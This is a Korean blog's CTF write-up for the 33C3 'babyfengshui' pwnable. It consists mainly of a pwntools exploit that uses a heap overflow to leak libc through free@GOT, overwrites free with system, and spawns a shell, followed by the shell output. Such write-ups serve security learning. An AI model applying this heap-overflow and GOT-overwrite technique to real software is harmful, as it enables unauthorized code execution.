33C3 CTF - babyfengshui

CTF/2016 2018. 12. 14. 18:53

Category : pwnable


Summary : heap overflow




Exploit

#!/usr/bin/python

from pwn import *

def cmd_add(alloc_size, input_size, name, data):
ru('Action')
sl(str(0))
ru('size of description: ')
sl(str(alloc_size))
ru('name: ')
sl(name)
ru('text length: ')
sl(str(input_size))
ru('text: ')
sl(data)

def cmd_del(idx):
ru('Action')
sl(str(1))
ru('index: ')
sl(str(idx))


def cmd_show(idx):
ru('Action')
sl(str(2))
ru('index: ')
sl(str(idx))
ru('name: ')
name = rl(False)
ru('description: ')
desc = rl(False)
return name, desc


def cmd_update(idx, input_size, data):
ru('Action')
sl(str(3))
ru('index: ')
sl(str(idx))
ru('text length: ')
sl(str(input_size))
ru('text: ')
sl(data)

free_got = 0x0804b010

s = process('./babyfengshui')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

cmd_add(0x20, 0x20, 'name', 'desc')
cmd_add(0x10, 0x10, 'overwriteme', 'desc2')
cmd_add(0x20, 0x20, 'name3', 'desc3')
cmd_add(0x100, 0x100, 'name4', 'sh')
cmd_del(0)
cmd_del(2)

pay = ''
pay += 'a' * 0x80
pay += p32(0) + p32(0x19)
pay += 'a' * 0x10
pay += p32(0) + p32(0x89)
pay += p32(free_got)
pay += 'overwriteok'

cmd_add(0x80, len(pay), 'name', pay)
_, leak = cmd_show(1)
libc_base = u32(leak[0:4]) - 0x70750
libc_system = libc_base + 0x3a940

cmd_update(1, 4, p32(libc_system))
cmd_del(3)

s.interactive()
s.close()


$ python ex.py 
[+] Starting local process './babyfengshui': pid 128654
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)



'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret